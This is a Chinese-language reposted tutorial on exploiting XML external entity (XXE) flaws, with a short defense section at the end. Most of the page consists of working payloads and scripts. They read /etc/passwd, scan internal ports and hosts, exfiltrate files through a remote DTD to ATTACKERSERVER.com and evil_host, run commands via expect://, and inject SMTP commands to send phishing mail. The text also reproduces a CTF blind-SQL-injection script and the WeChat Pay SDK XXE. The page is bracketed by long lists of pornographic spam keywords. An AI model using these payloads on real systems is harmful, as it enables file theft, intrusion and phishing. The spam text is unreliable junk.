久久精品国产精品国产精品污,男人扒开添女人下部免费视频,一级国产69式性姿势免费视频,夜鲁夜鲁很鲁在线视频 视频,欧美丰满少妇一区二区三区,国产偷国产偷亚洲高清人乐享,中文 在线 日韩 亚洲 欧美,熟妇人妻无乱码中文字幕真矢织江,一区二区三区人妻制服国产

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程语言 > asp.net >内容正文

asp.net

XXE漏洞利用技巧(XML注入):从XML到远程代码执行

發布時間:2025/3/15 asp.net 26 豆豆
生活随笔 收集整理的這篇文章主要介紹了 XXE漏洞利用技巧(XML注入):从XML到远程代码执行 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

目錄

什么是XXE

基本利用

Blind OOB XXE

場景1 - 端口掃描

場景2 - 通過DTD竊取文件

場景3 - 遠程代碼執行

場景4 - 釣魚

場景4 - HTTP 內網主機探測

場景5?- 內網盲注(CTF)

場景6?- 文件上傳

緩解措施

真實的 XXE 出現在哪

實例一:模擬情況

實例二:微信支付的 XXE

實例三:JSON content-type XXE

六、XXE 如何防御

方案一:使用語言中推薦的禁用外部實體的方法

方案二:手動黑名單過濾(不推薦)


什么是XXE

簡單來說,XXE就是XML外部實體注入。當允許引用外部實體時,通過構造惡意內容,就可能導致任意文件讀取、系統命令執行、內網端口探測、攻擊內網網站等危害。

例如,如果你當前使用的程序為PHP,則可以將libxml_disable_entity_loader設置為TRUE來禁用外部實體,從而起到防御的目的。

基本利用

通常攻擊者會將payload注入XML文件中,一旦文件被執行,將會讀取服務器上的本地文件,并對內網發起訪問掃描內部網絡端口。換而言之,XXE是一種從本地到達各種服務的方法。此外,在一定程度上這也可能幫助攻擊者繞過防火墻規則過濾或身份驗證檢查。

以下是一個簡單的XML代碼POST請求示例:

POST /vulnerable HTTP/1.1 Host: www.test.com User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: https://test.com/test.html Content-Type: application/xml Content-Length: 294 Cookie: mycookie=cookies; Connection: close Upgrade-Insecure-Requests: 1<?xml version="1.0"?> <catalog><core id="test101"><author>John, Doe</author><title>I love XML</title><category>Computers</category><price>9.99</price><date>2018-10-01</date><description>XML is the best!</description></core> </catalog>

之后,上述代碼將交由服務器的XML處理器解析。代碼被解釋并返回:{"Request Successful": "Added!"}

現在,當攻擊者試圖濫用XML代碼解析時會發生什么?讓我們編輯代碼并包含我們的惡意payload:

<?xml version="1.0"?> <!DOCTYPE GVI [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <catalog><core id="test101"><author>John, Doe</author><title>I love XML</title><category>Computers</category><price>9.99</price><date>2018-10-01</date><description>&xxe;</description></core> </catalog>

代碼被解釋并返回:

{"error": "no results for description root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync...

還有比較明顯的

http頭出現 Content-type:text/xml 很有可能存在XXE漏洞

畢竟還有這兩個是大殺器

1.https://fofa.so/

header=xml && country=IN (讀者可以自行搜索試下)

2.www.shodan.io?(無研究,需head中有text/xml思路即可)

Blind OOB XXE

如上例所示,服務器將/etc/passwd文件的內容作為響應返回給我們的XXE。但是在某些情況下,即便服務器可能存在XXE,也不會向攻擊者的瀏覽器或代理返回任何響應。遇到這種情況,我們可以使用Blind XXE漏洞來構建一條外帶數據(OOB)通道來讀取數據。雖然我們無法直接查看文件內容,但我們仍然可以使用易受攻擊的服務器作為代理,在外部網絡上執行掃描以及代碼。

場景1 - 端口掃描

在第一個示例中,我們通過URI將請求指向了/etc/passwd文件,并最終成功的為我們返回了文件中的內容。除此之外,我們也可以使用http URI并強制服務器向我們指定的端點和端口發送GET請求,將XXE轉換為SSRF(服務器端請求偽造)。

以下代碼將嘗試與端口8080通信,根據響應時間/長度,攻擊者將可以判斷該端口是否已被開啟。

<?xml version="1.0"?> <!DOCTYPE GVI [<!ENTITY xxe SYSTEM "http://127.0.0.1:8080" >]> <catalog><core id="test101"><author>John, Doe</author><title>I love XML</title><category>Computers</category><price>9.99</price><date>2018-10-01</date><description>&xxe;</description></core> </catalog>

場景2 - 通過DTD竊取文件

外部文檔類型定義(DTD)文件可被用于觸發OOB XXE。攻擊者將.dtd文件托管在VPS上,使遠程易受攻擊的服務器獲取該文件并執行其中的惡意命令。

以下請求將被發送到應用程序以演示和測試該方法:

<?xml version="1.0"?> <!DOCTYPE data SYSTEM "http://ATTACKERSERVER.com/xxe_file.dtd"> <catalog><core id="test101"><author>John, Doe</author><title>I love XML</title><category>Computers</category><price>9.99</price><date>2018-10-01</date><description>&xxe;</description></core> </catalog>

上述代碼一旦由易受攻擊的服務器處理,就會向我們的遠程服務器發送請求,查找包含我們的payload的DTD文件:

<!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % all "<!ENTITY xxe SYSTEM 'http://ATTACKESERVER.com/?%file;'>"> %all;

讓我們花點時間了解上述請求的執行流程。結果是有兩個請求被發送到了我們的服務器,第二個請求為/etc/passwd文件的內容。

在我們的VPS日志中我們可以看到,帶有文件內容的第二個請求,以此我們也確認了OOB XXE漏洞的存在:

http://ATTACKERSERVER.com/?daemon%3Ax%3A1%3A1%3Adaemon%3A%2Fusr%2Fsbin%3A%2Fbin%2Fsh%0Abin%3Ax%3A2%3A2%3Abin%3A%2Fbin%3A%2Fbin%2Fsh

場景3 - 遠程代碼執行

這種情況很少發生,但有些情況下攻擊者能夠通過XXE執行代碼,這主要是由于配置不當/開發內部應用導致的。如果我們足夠幸運,并且PHP expect模塊被加載到了易受攻擊的系統或處理XML的內部應用程序上,那么我們就可以執行如下的命令:

<?xml version="1.0"?> <!DOCTYPE GVI [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "expect://id" >]> <catalog><core id="test101"><author>John, Doe</author><title>I love XML</title><category>Computers</category><price>9.99</price><date>2018-10-01</date><description>&xxe;</description></core> </catalog>

響應:

{"error": "no results for description uid=0(root) gid=0(root) groups=0(root)...

場景4 - 釣魚

我們使用Java的XML解析器找到了一個易受攻擊的端點。掃描內部端口后,我們發現了一個偵聽在25端口的SMTP服務,Java支持在sun.net.ftp.impl.FtpClient中的ftp URI。因此,我們可以指定用戶名和密碼,例如ftp://user:password@host:port/test.txt,FTP客戶端將在連接中發送相應的USER命令。

但是如果我們將%0D%0A?(CRLF)添加到URL的user部分的任意位置,我們就可以終止USER命令并向FTP會話中注入一個新的命令,即允許我們向25端口發送任意的SMTP命令:

ftp://a%0D%0A EHLO%20a%0D%0A MAIL%20FROM%3A%3Csupport%40VULNERABLESYSTEM.com%3E%0D%0A RCPT%20TO%3A%3Cvictim%40gmail.com%3E%0D%0A DATA%0D%0A From%3A%20support%40VULNERABLESYSTEM.com%0A To%3A%20victim%40gmail.com%0A Subject%3A%20test%0A %0A test!%0A %0D%0A .%0D%0A QUIT%0D%0A :a@VULNERABLESYSTEM.com:25

當FTP客戶端使用此URL連接時,以下命令將會被發送給VULNERABLESYSTEM.com上的郵件服務器:

ftp://a EHLO a MAIL FROM: <support@VULNERABLESYSTEM.com> RCPT TO: <victim@gmail.com> DATA From: support@VULNERABLESYSTEM.com To: victim@gmail.com Subject: Reset your password We need to confirm your identity. Confirm your password here: http://PHISHING_URL.com . QUIT :support@VULNERABLESYSTEM.com:25

這意味著攻擊者可以從從受信任的來源發送釣魚郵件(例如:帳戶重置鏈接)并繞過垃圾郵件過濾器的檢測。除了鏈接之外,甚至我們也可以發送附件。

場景4 - HTTP 內網主機探測

我們以存在 XXE 漏洞的服務器為我們探測內網的支點。要進行內網探測我們還需要做一些準備工作,我們需要先利用 file 協議讀取我們作為支點服務器的網絡配置文件,看一下有沒有內網,以及網段大概是什么樣子(我以linux 為例),我們可以嘗試讀取 /etc/network/interfaces 或者 /proc/net/arp 或者 /etc/host 文件以后我們就有了大致的探測方向了

下面是一個探測腳本的實例:

import requests import base64#Origtional XML that the server accepts #<xml> # <stuff>user</stuff> #</xml>def build_xml(string):xml = """<?xml version="1.0" encoding="ISO-8859-1"?>"""xml = xml + "\r\n" + """<!DOCTYPE foo [ <!ELEMENT foo ANY >"""xml = xml + "\r\n" + """<!ENTITY xxe SYSTEM """ + '"' + string + '"' + """>]>"""xml = xml + "\r\n" + """<xml>"""xml = xml + "\r\n" + """ <stuff>&xxe;</stuff>"""xml = xml + "\r\n" + """</xml>"""send_xml(xml)def send_xml(xml):headers = {'Content-Type': 'application/xml'}x = requests.post('http://34.200.157.128/CUSTOM/NEW_XEE.php', data=xml, headers=headers, timeout=5).textcoded_string = x.split(' ')[-2] # a little split to get only the base64 encoded valueprint coded_string # print base64.b64decode(coded_string) for i in range(1, 255):try:i = str(i)ip = '10.0.0.' + istring = 'php://filter/convert.base64-encode/resource=http://' + ip + '/'print stringbuild_xml(string)except: continue

返回結果:

場景5?- 內網盲注(CTF)

2018 強網杯 有一道題就是利用 XXE 漏洞進行內網的 SQL 盲注的,大致的思路如下:

首先在外網的一臺ip地址為 39.107.33.75:33899 的評論框處測試發現 XXE 漏洞,我們輸入 xml 以及 dtd 會出現報錯

如圖所示:

既然如此,那么我們是不是能讀取該服務器上面的文件,我們先讀配置文件(這個點是 Blind XXE ,必須使用參數實體,外部引用 DTD )

/var/www/52dandan.cc/public_html/config.php

拿到第一部分 flag

<?php define(BASEDIR, "/var/www/52dandan.club/"); define(FLAG_SIG, 1); define(SECRETFILE,'/var/www/52dandan.com/public_html/youwillneverknowthisfile_e2cd3614b63ccdcbfe7c8f07376fe431'); .... ?>

注意:

這里有一個小技巧,當我們使用 libxml 讀取文件內容的時候,文件不能過大,如果太大就會報錯,于是我們就需要使用 php
過濾器的一個壓縮的方法

壓縮:echo file_get_contents("php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd");
解壓:echo file_get_contents("php://filter/read=convert.base64-decode/zlib.inflate/resource=/tmp/1");

然后我們考慮內網有沒有東西,我們讀取

/proc/net/arp /etc/host

找到內網的另一臺服務器的 ip 地址 192.168.223.18

拿到這個 ip 我們考慮就要使用 XXE 進行端口掃描了,然后我們發現開放了 80 端口,然后我們再進行目錄掃描,找到一個 test.php ,根據提示,這個頁面的 shop 參數存在一個注入,但是因為本身這個就是一個 Blind XXE ,我們的對服務器的請求都是在我們的遠程 DTD 中包含的,現在我們需要改變我們的請求,那我們就要在每一次修改請求的時候修改我們遠程服務器的 DTD 文件,于是我們的腳本就要掛在我們的 VPS 上,一邊邊修改 DTD 一邊向存在 XXE 漏洞的主機發送請求,腳本就像下面這個樣子

示例代碼:

import requests url = 'http://39.107.33.75:33899/common.php' s = requests.Session() result = '' data = {"name":"evil_man","email":"testabcdefg@gmail.com","comment":"""<?xml version="1.0" encoding="utf-8"?><!DOCTYPE root [<!ENTITY % dtd SYSTEM "http://evil_host/evil.dtd">%dtd;]>""" }for i in range(0,28):for j in range(48,123):f = open('./evil.dtd','w')payload2 = """<!ENTITY % file SYSTEM "php://filter/read=zlib.deflate/convert.base64-encode/resource=http://192.168.223.18/test.php?shop=3'-(case%a0when((select%a0group_concat(total)%a0from%a0albert_shop)like%a0binary('{}'))then(0)else(1)end)-'1"><!ENTITY % all "<!ENTITY % send SYSTEM 'http://evil_host/?result=%file;'>">%all;%send;""".format('_'*i+chr(j)+'_'*(27-i))f.write(payload2)f.close()print 'test {}'.format(chr(j))r = s.post(url,data=data)if "Oti3a3LeLPdkPkqKF84xs=" in r.content and chr(j)!='_':result += chr(j)print chr(j)break print result

這道題難度比加大,做起來也非常的耗時,所有的東西都要靠腳本去猜,因此當時是0解

場景6?- 文件上傳

我們之前說的好像都是 php 相關,但是實際上現實中很多都是 java 的框架出現的 XXE 漏洞,通過閱讀文檔,我發現 Java 中有一個比較神奇的協議 jar:// , php 中的 phar:// 似乎就是為了實現 jar:// 的類似的功能設計出來的。

jar:// 協議的格式:

jar:{url}!{path}

實例:

jar:http://host/application.jar!/file/within/the/zip這個 ! 后面就是其需要從中解壓出的文件

jar 能從遠程獲取 jar 文件,然后將其中的內容進行解壓,等等,這個功能似乎比 phar 強大啊,phar:// 是沒法遠程加載文件的(因此 phar:// 一般用于繞過文件上傳,在一些2016年的HCTF中考察過這個知識點,我也曾在校賽中出過類似的題目,奧,2018年的 blackhat 講述的 phar:// 的反序列化很有趣,Orange 曾在2017年的 hitcon 中出過這道題)

jar 協議處理文件的過程:

(1) 下載 jar/zip 文件到臨時文件中
(2) 提取出我們指定的文件
(3) 刪除臨時文件

那么我們怎么找到我們下載的臨時文件呢?

因為在 java 中 file:/// 協議可以起到列目錄的作用,所以我們能用 file:/// 協議配合 jar:// 協議使用

下面是我的一些測試過程:

我首先在本地模擬一個存在 XXE 的程序,網上找的能直接解析 XML 文件的 java 源碼

示例代碼:

xml_test.java

package xml_test; import java.io.File;import javax.xml.parsers.DocumentBuilder; import javax.xml.parsers.DocumentBuilderFactory;import org.w3c.dom.Attr; import org.w3c.dom.Comment; import org.w3c.dom.Document; import org.w3c.dom.Element; import org.w3c.dom.NamedNodeMap; import org.w3c.dom.Node; import org.w3c.dom.NodeList;/*** 使用遞歸解析給定的任意一個xml文檔并且將其內容輸出到命令行上* @author zhanglong**/ public class xml_test {public static void main(String[] args) throws Exception{DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();DocumentBuilder db = dbf.newDocumentBuilder();Document doc = db.parse(new File("student.xml"));//獲得根元素結點Element root = doc.getDocumentElement();parseElement(root);}private static void parseElement(Element element){String tagName = element.getNodeName();NodeList children = element.getChildNodes();System.out.print("<" + tagName);//element元素的所有屬性所構成的NamedNodeMap對象,需要對其進行判斷NamedNodeMap map = element.getAttributes();//如果該元素存在屬性if(null != map){for(int i = 0; i < map.getLength(); i++){//獲得該元素的每一個屬性Attr attr = (Attr)map.item(i);String attrName = attr.getName();String attrValue = attr.getValue();System.out.print(" " + attrName + "=\"" + attrValue + "\"");}}System.out.print(">");for(int i = 0; i < children.getLength(); i++){Node node = children.item(i);//獲得結點的類型short nodeType = node.getNodeType();if(nodeType == Node.ELEMENT_NODE){//是元素,繼續遞歸parseElement((Element)node);}else if(nodeType == Node.TEXT_NODE){//遞歸出口System.out.print(node.getNodeValue());}else if(nodeType == Node.COMMENT_NODE){System.out.print("<!--");Comment comment = (Comment)node;//注釋內容String data = comment.getData();System.out.print(data);System.out.print("-->");}}System.out.print("</" + tagName + ">");} }

有了這個源碼以后,我們需要在本地建立一個 xml 文件 ,我取名為 student.xml

student.xml

<!DOCTYPE convert [ <!ENTITY remote SYSTEM "jar:http://localhost:9999/jar.zip!/wm.php"> ]> <convert>&remote;</convert>

目錄結構如下圖:

可以清楚地看到我的請求是向自己本地的 9999 端口發出的,那么9999 端口上有什么服務呢?實際上是我自己用 python 寫的一個 TCP 服務器

示例代碼:

sever.py

import sys import time import threading import socketserver from urllib.parse import quote import http.client as httpc listen_host = 'localhost' listen_port = 9999 jar_file = sys.argv[1]class JarRequestHandler(socketserver.BaseRequestHandler): def handle(self):http_req = b''print('New connection:',self.client_address)while b'\r\n\r\n' not in http_req:try:http_req += self.request.recv(4096)print('Client req:\r\n',http_req.decode())jf = open(jar_file, 'rb')contents = jf.read()headers = ('''HTTP/1.0 200 OK\r\n''''''Content-Type: application/java-archive\r\n\r\n''')self.request.sendall(headers.encode('ascii'))self.request.sendall(contents[:-1])time.sleep(30)print(30)self.request.sendall(contents[-1:])except Exception as e:print ("get error at:"+str(e))if __name__ == '__main__':jarserver = socketserver.TCPServer((listen_host,listen_port), JarRequestHandler) print ('waiting for connection...') server_thread = threading.Thread(target=jarserver.serve_forever) server_thread.daemon = True server_thread.start() server_thread.join()

這個服務器的目的就是接受客戶端的請求,然后向客戶端發送一個我們運行時就傳入的參數指定的文件,但是還沒完,實際上我在這里加了一個 sleep(30),這個的目的我后面再說

既然是文件上傳,那我們又要回到 jar 協議解析文件的過程中了

jar 協議處理文件的過程:

(1) 下載 jar/zip 文件到臨時文件中
(2) 提取出我們指定的文件
(3) 刪除臨時文件

那我們怎么找到這個臨時的文件夾呢?不用想,肯定是通過報錯的形式展現,如果我們請求的

jar:http://localhost:9999/jar.zip!/1.php

1.php 在這個 jar.zip 中沒有的話,java 解析器就會報錯,說在這個臨時文件中找不到這個文件

如下圖:

既然找到了臨時文件的路徑,我們就要考慮怎么使用這個文件了(或者說怎么讓這個文件能更長時間的停留在我們的系統之中,我想到的方式就是sleep())但是還有一個問題,因為我們要利用的時候肯定是在文件沒有完全傳輸成果的時候,因此為了文件的完整性,我考慮在傳輸前就使用 hex 編輯器在文件末尾添加垃圾字符,這樣就能完美的解決這個問題

下面是我的實驗錄屏:

https://xzfile.aliyuncs.com/media/upload/picture/20181120002650-eae69596-ec17-1.gif

實驗就到這一步了,怎么利用就看各位大佬的了(壞笑)

我后來在LCTF 2018 出了這樣一個 CTF 題目,詳細的 wp 可以看我的這篇文章

緩解措施

上面討論的主要問題就是XML解析器解析了用戶發送的不可信數據。然而,要去校驗DTD(document type definition)中SYSTEM標識符定義的數據,并不容易,也不大可能。大部分的XML解析器默認對于XXE攻擊是脆弱的。因此,最好的解決辦法就是配置XML處理器去使用本地靜態的DTD,不允許XML中含有任何自己聲明的DTD。

真實的 XXE 出現在哪

我們剛剛說了那么多,都是只是我們對這個漏洞的理解,但是好像還沒說這種漏洞出現在什么地方

如今的 web 時代,是一個前后端分離的時代,有人說 MVC 就是前后端分離,但我覺得這種分離的并不徹底,后端還是要嘗試去調用渲染類去控制前端的渲染,我所說的前后端分離是,后端 api 只負責接受約定好要傳入的數據,然后經過一系列的黑盒運算,將得到結果以 json 格式返回給前端,前端只負責坐享其成,拿到數據json.decode 就行了(這里的后端可以是后臺代碼,也可以是外部的api 接口,這里的前端可以是傳統意義的前端,也可以是后臺代碼)

那么問題經常就出現在 api 接口能解析客戶端傳過來的 xml 代碼,并且直接外部實體的引用,比如下面這個

實例一:模擬情況

示例代碼:

POST /vulnerable HTTP/1.1 Host: www.test.com User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: https://test.com/test.html Content-Type: application/xml Content-Length: 294 Cookie: mycookie=cookies; Connection: close Upgrade-Insecure-Requests: 1<?xml version="1.0"?> <catalog><core id="test101"><author>John, Doe</author><title>I love XML</title><category>Computers</category><price>9.99</price><date>2018-10-01</date><description>XML is the best!</description></core> </catalog>

我們發出 帶有 xml 的 POST 請求以后,述代碼將交由服務器的XML處理器解析。代碼被解釋并返回:{“Request Successful”: “Added!”}

但是如果我們傳入一個惡意的代碼

<?xml version="1.0"?> <!DOCTYPE GVI [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <catalog><core id="test101"><author>John, Doe</author><title>I love XML</title><category>Computers</category><price>9.99</price><date>2018-10-01</date><description>&xxe;</description></core> </catalog>

如果沒有做好“安全措施” 就會出現解析惡意代碼的情況,就會有下面的返回

{"error": "no results for description root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync...

實例二:微信支付的 XXE

前一陣子非常火的微信支付的 XXE 漏洞當然不得不提,

漏洞描述:

微信支付提供了一個 api 接口,供商家接收異步支付結果,微信支付所用的java sdk在處理結果時可能觸發一個XXE漏洞,攻擊者可以向這個接口發送構造惡意payloads,獲取商家服務器上的任何信息,一旦攻擊者獲得了敏感的數據 (md5-key and merchant-Id etc.),他可能通過發送偽造的信息不用花錢就購買商家任意物品

我下載了 java 版本的 sdk 進行分析,這個 sdk 提供了一個 WXPayUtil 工具類,該類中實現了xmltoMap和maptoXml這兩個方法,而這次的微信支付的xxe漏洞爆發點就在xmltoMap方法中

如圖所示:

問題就出現在我橫線劃出來的那部分,也就是簡化為下面的代碼:

public static Map<String, String> xmlToMap(String strXML) throws Exception {try {Map<String, String> data = new HashMap<String, String>();DocumentBuilder documentBuilder = WXPayXmlUtil.newDocumentBuilder();InputStream stream = new ByteArrayInputStream(strXML.getBytes("UTF-8"));org.w3c.dom.Document doc = documentBuilder.parse(stream);...

我們可以看到 當構建了 documentBuilder 以后就直接對傳進來的 strXML 解析了,而不巧的是 strXML 是一處攻擊者可控的參數,于是就出現了 XXE 漏洞,下面是我實驗的步驟

首先我在 com 包下又新建了一個包,來寫我們的測試代碼,測試代碼我命名為 test001.java

如圖所示:

test001.java

package com.test.test001; import java.util.Map; import static com.github.wxpay.sdk.WXPayUtil.xmlToMap;public class test001 {public static void main(String args[]) throws Exception {String xmlStr ="<?xml version='1.0' encoding='utf-8'?>\r\n" +"<!DOCTYPE XDSEC [\r\n" +"<!ENTITY xxe SYSTEM 'file:///d:/1.txt'>]>\r\n" +"<XDSEC>\r\n"+"<XXE>&xxe;</XXE>\r\n" +"</XDSEC>";try{Map<String,String> test = xmlToMap(xmlStr);System.out.println(test);}catch (Exception e){e.printStackTrace();}} }

我希望它能讀取我 D 盤下面的 1.txt 文件

運行后成功讀取

如圖所示:

當然,WXPayXmlUtil.java 中有這個 sdk 的配置項,能直接決定實驗的效果,當然后期的修復也是針對這里面進行修復的

http://apache.org/xml/features/disallow-doctype-decl true http://apache.org/xml/features/nonvalidating/load-external-dtd false http://xml.org/sax/features/external-general-entities false http://xml.org/sax/features/external-parameter-entities false

整個源碼我打包好了已經上傳到我的百度云,有興趣的童鞋可以運行一下感受:

鏈接:百度網盤 請輸入提取碼?提取碼:xq1b

上面說過 java 中有一個 netdoc:/ 協議能代替 file:/// ,我現在來演示一下:

如圖所示:

實例三:JSON content-type XXE

正如我們所知道的,很多web和移動應用都基于客戶端-服務器交互模式的web通信服務。不管是SOAP還是RESTful,一般對于web服務來說,最常見的數據格式都是XML和JSON。盡管web服務可能在編程時只使用其中一種格式,但服務器卻可以接受開發人員并沒有預料到的其他數據格式,這就有可能會導致JSON節點受到XXE(XML外部實體)攻擊

原始請求和響應:

HTTP Request:

POST /netspi HTTP/1.1 Host: someserver.netspi.com Accept: application/json Content-Type: application/json Content-Length: 38{"search":"name","value":"netspitest"}

HTTP Response:

HTTP/1.1 200 OK Content-Type: application/json Content-Length: 43{"error": "no results for name netspitest"}

現在我們嘗試將 Content-Type 修改為 application/xml

進一步請求和響應:

HTTP Request:

POST /netspi HTTP/1.1 Host: someserver.netspi.com Accept: application/json Content-Type: application/xml Content-Length: 38{"search":"name","value":"netspitest"}

HTTP Response:

HTTP/1.1 500 Internal Server Error Content-Type: application/json Content-Length: 127{"errors":{"errorMessage":"org.xml.sax.SAXParseException: XML document structures must start and end within the same entity."}}

可以發現服務器端是能處理 xml 數據的,于是我們就可以利用這個來進行攻擊

最終的請求和響應:

HTTP Request:

POST /netspi HTTP/1.1 Host: someserver.netspi.com Accept: application/json Content-Type: application/xml Content-Length: 288<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <root> <search>name</search> <value>&xxe;</value> </root>

HTTP Response:

HTTP/1.1 200 OK Content-Type: application/json Content-Length: 2467{"error": "no results for name root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync....

六、XXE 如何防御

方案一:使用語言中推薦的禁用外部實體的方法

PHP:

libxml_disable_entity_loader(true);

JAVA:

DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance(); dbf.setExpandEntityReferences(false);.setFeature("http://apache.org/xml/features/disallow-doctype-decl",true);.setFeature("http://xml.org/sax/features/external-general-entities",false).setFeature("http://xml.org/sax/features/external-parameter-entities",false);

Python:

from lxml import etree xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

方案二:手動黑名單過濾(不推薦)

過濾關鍵詞:

<!DOCTYPE、<!ENTITY SYSTEM、PUBLIC

總結

以上是生活随笔為你收集整理的XXE漏洞利用技巧(XML注入):从XML到远程代码执行的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

日韩亚洲欧美中文高清在线 | 亚洲 激情 小说 另类 欧美 | 大屁股大乳丰满人妻 | 午夜性刺激在线视频免费 | 欧美肥老太牲交大战 | 伊人久久婷婷五月综合97色 | av在线亚洲欧洲日产一区二区 | 午夜理论片yy44880影院 | 成人欧美一区二区三区黑人免费 | 亚洲码国产精品高潮在线 | 特级做a爰片毛片免费69 | 性欧美牲交xxxxx视频 | 欧美日韩一区二区免费视频 | 国产av一区二区三区最新精品 | 欧美日韩在线亚洲综合国产人 | 欧洲精品码一区二区三区免费看 | 午夜时刻免费入口 | 一本精品99久久精品77 | 国产xxx69麻豆国语对白 | 欧美老熟妇乱xxxxx | 中文无码精品a∨在线观看不卡 | 牲交欧美兽交欧美 | 国产精品18久久久久久麻辣 | 亚洲成a人片在线观看无码3d | 波多野42部无码喷潮在线 | 亚洲日韩av一区二区三区中文 | 国产偷抇久久精品a片69 | 四十如虎的丰满熟妇啪啪 | 性色欲网站人妻丰满中文久久不卡 | 婷婷六月久久综合丁香 | 亚洲日韩av片在线观看 | 日本xxxx色视频在线观看免费 | 大胆欧美熟妇xx | 日本一卡2卡3卡4卡无卡免费网站 国产一区二区三区影院 | 色婷婷av一区二区三区之红樱桃 | 性做久久久久久久免费看 | 婷婷五月综合缴情在线视频 | 欧美日韩久久久精品a片 | 帮老师解开蕾丝奶罩吸乳网站 | 精品国产一区av天美传媒 | 亚洲性无码av中文字幕 | 欧美性生交xxxxx久久久 | 国产精品久久福利网站 | 三上悠亚人妻中文字幕在线 | 日日摸日日碰夜夜爽av | 国産精品久久久久久久 | 国精品人妻无码一区二区三区蜜柚 | 欧美国产日产一区二区 | 国内揄拍国内精品人妻 | 无码av免费一区二区三区试看 | 久久午夜无码鲁丝片 | 丝袜足控一区二区三区 | 欧美野外疯狂做受xxxx高潮 | 一二三四在线观看免费视频 | 国产亚洲精品久久久久久国模美 | 精品国产福利一区二区 | 日本丰满熟妇videos | 国产精品资源一区二区 | 欧美老妇与禽交 | 久在线观看福利视频 | 精品水蜜桃久久久久久久 | 亚洲狠狠婷婷综合久久 | 精品一区二区三区无码免费视频 | 亚洲狠狠婷婷综合久久 | 亚洲 日韩 欧美 成人 在线观看 | 亚洲va欧美va天堂v国产综合 | 日本大香伊一区二区三区 | 日韩精品成人一区二区三区 | 清纯唯美经典一区二区 | 人人妻人人澡人人爽精品欧美 | 国产suv精品一区二区五 | 嫩b人妻精品一区二区三区 | 国产精品鲁鲁鲁 | 99久久精品午夜一区二区 | 成熟妇人a片免费看网站 | 玩弄少妇高潮ⅹxxxyw | 熟女少妇人妻中文字幕 | 无码国产乱人伦偷精品视频 | 亚洲综合在线一区二区三区 | 精品水蜜桃久久久久久久 | 网友自拍区视频精品 | 婷婷色婷婷开心五月四房播播 | 一本一道久久综合久久 | 国产精品a成v人在线播放 | 日本一区二区更新不卡 | 久久久久se色偷偷亚洲精品av | 色 综合 欧美 亚洲 国产 | 成年美女黄网站色大免费视频 | 国产色精品久久人妻 | 一本久久伊人热热精品中文字幕 | aⅴ在线视频男人的天堂 | 久久久久久国产精品无码下载 | 久久aⅴ免费观看 | 亚洲va中文字幕无码久久不卡 | 国产午夜无码精品免费看 | a在线观看免费网站大全 | 色五月五月丁香亚洲综合网 | 欧美熟妇另类久久久久久不卡 | 性生交大片免费看女人按摩摩 | 在线a亚洲视频播放在线观看 | 久久国产劲爆∧v内射 | 一个人免费观看的www视频 | 少妇久久久久久人妻无码 | 国产午夜亚洲精品不卡下载 | 装睡被陌生人摸出水好爽 | 欧美日韩视频无码一区二区三 | 亚洲成av人综合在线观看 | 人人爽人人爽人人片av亚洲 | 亚洲日韩av一区二区三区中文 | 国产无套粉嫩白浆在线 | 玩弄人妻少妇500系列视频 | 亚洲gv猛男gv无码男同 | 中文字幕人成乱码熟女app | 国产办公室秘书无码精品99 | 天堂无码人妻精品一区二区三区 | 久久成人a毛片免费观看网站 | 四虎影视成人永久免费观看视频 | 精品久久8x国产免费观看 | 亚洲国产成人a精品不卡在线 | 激情内射日本一区二区三区 | 亚洲а∨天堂久久精品2021 | 亚洲国产一区二区三区在线观看 | 免费视频欧美无人区码 | 亚洲欧美国产精品久久 | 波多野结衣高清一区二区三区 | 午夜精品久久久久久久久 | 亚洲一区二区观看播放 | 动漫av网站免费观看 | 亚洲日韩av一区二区三区四区 | 欧美日韩视频无码一区二区三 | 亚洲中文字幕av在天堂 | 欧美亚洲日韩国产人成在线播放 | 未满成年国产在线观看 | 99精品视频在线观看免费 | 麻豆md0077饥渴少妇 | 久久久久av无码免费网 | 黑人巨大精品欧美黑寡妇 | 亚洲精品一区国产 | 亚洲色欲久久久综合网东京热 | 无人区乱码一区二区三区 | 久久久av男人的天堂 | 国产网红无码精品视频 | 欧美成人免费全部网站 | 国产精品资源一区二区 | 高清无码午夜福利视频 | 精品久久久中文字幕人妻 | 精品人人妻人人澡人人爽人人 | 国产精品资源一区二区 | 秋霞成人午夜鲁丝一区二区三区 | 久热国产vs视频在线观看 | 成人免费视频一区二区 | 日本熟妇乱子伦xxxx | 一本大道久久东京热无码av | 久久久久国色av免费观看性色 | 免费人成在线视频无码 | 国产成人综合色在线观看网站 | 在线观看免费人成视频 | 无码av岛国片在线播放 | 乱人伦人妻中文字幕无码 | 国产69精品久久久久app下载 | 